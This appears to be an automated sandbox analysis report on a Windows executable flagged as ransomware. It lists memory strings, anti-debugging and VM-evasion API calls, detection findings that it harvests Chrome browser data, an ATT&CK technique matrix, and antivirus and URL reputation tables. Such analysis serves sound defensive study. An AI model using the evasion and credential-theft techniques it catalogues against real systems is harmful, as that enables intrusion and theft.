Source: explorer.exe, 00000007.00000003.310457564.00000000087A8000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}FL.
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
Source: explorer.exe, 00000007.00000003.394797344.000000000D138000.00000004.00000001.sdmpBinary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A}
Source: explorer.exe, 00000007.00000003.445129469.000000000D09E000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1
Source: explorer.exe, 00000004.00000000.244442266.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: 0000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f
Source: explorer.exe, 00000004.00000000.243875446.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000003.361935461.000000000D202000.00000004.00000001.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI&
Source: explorer.exe, 00000007.00000003.446576781.000000000D02F000.00000004.00000001.sdmpBinary or memory string: 6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f
Source: explorer.exe, 00000007.00000003.394797344.000000000D138000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.394797344.000000000D138000.00000004.00000001.sdmpBinary or memory string: -90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: 6e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000^
Source: explorer.exe, 00000007.00000003.365967246.000000000D22E000.00000004.00000001.sdmpBinary or memory string: ?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.322302501.000000000D0A0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B`>?
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000003.358517403.000000000D080000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchUI.exe, 00000010.00000002.365408456.000001D3CABCF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000007.00000003.366164128.000000000D02D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Roaming
Source: explorer.exe, 00000007.00000003.307759036.0000000008761000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

barindex
Potentially malicious time measurement code foundShow sources
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA3A900_2_00BA3A90
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA3B000_2_00BA3B00
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA3880 rdtsc 0_2_00BA3880
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C6FA46 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C6FA46
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C79CB0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00C79CB0
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C6FA46 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C6FA46
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C69C26 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C69C26
Source: explorer.exe, 00000004.00000000.211119588.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA3680 cpuid 0_2_00BA3680
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: GetLocaleInfoA,0_2_00C7B2DF
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C7555F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00C7555F
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C793FB __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_00C793FB
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA7A30 GetStdHandle,GetFileType,_vswprintf_s,WriteFile,MultiByteToWideChar,_vswprintf_s,GetVersion,RegisterEventSourceW,ReportEventW,DeregisterEventSource,MessageBoxW,0_2_00BA7A30
Source: C:\Users\user\Desktop\bkscEXd86b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: SearchUI.exe, 00000010.00000002.394743902.000001DBD14D0000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Windows Defender\MSASCui.exe

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.dbJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\chrome_shutdown_ms.txtJump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.datJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Windows Service13Windows Service13Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data111Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Default AccountsService Execution12Browser Extensions1Process Injection2Obfuscated Files or Information4Input Capture1File and Directory Discovery4Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Registry Run Keys / Startup Folder1Registry Run Keys / Startup Folder1Software Packing1Security Account ManagerSystem Information Discovery34SMB/Windows Admin SharesData from Local System1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSQuery Registry1Distributed Component Object ModelInput Capture1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion3LSA SecretsSecurity Software Discovery41SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection2Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
bkscEXd86b.exe1%VirustotalBrowse
bkscEXd86b.exe11%MetadefenderBrowse
bkscEXd86b.exe43%ReversingLabsWin32.Ransomware.Encoder
bkscEXd86b.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
https://mths.be/fromcodepoint0%VirustotalBrowse
https://mths.be/fromcodepoint0%Avira URL Cloudsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
https://aefd.nelreports.net/api/report?catHTTP/1.10%Avira URL Cloudsafe
http://fontfabrik.com0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe
http://facebook.github.io/react/docs/error-decoder.html?invariant0%VirustotalBrowse
http://facebook.github.io/react/docs/error-decoder.html?invariant0%Avira URL Cloudsafe
https://aefd.nelreports.ne0%Avira URL Cloudsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
    		high
    http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
      		high
      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
        		high
        http://schemas.live.com/Web/1betSearchUI.exe, 00000010.00000002.360813914.000001D3C88B2000.00000004.00000001.sdmpfalse
          		high
          http://www.tiro.comSearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.fontbureau.com/designersSearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
            		high
            https://mths.be/fromcodepointSearchUI.exe, 00000010.00000003.314210472.000001DBD0760000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.435616084.0000015F35883000.00000004.00000001.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.goodfont.co.krexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://www.msn.com/spartan/dhpSearchUI.exe, 00000010.00000002.386080523.000001D3CFEA8000.00000004.00000001.sdmpfalse
              		high
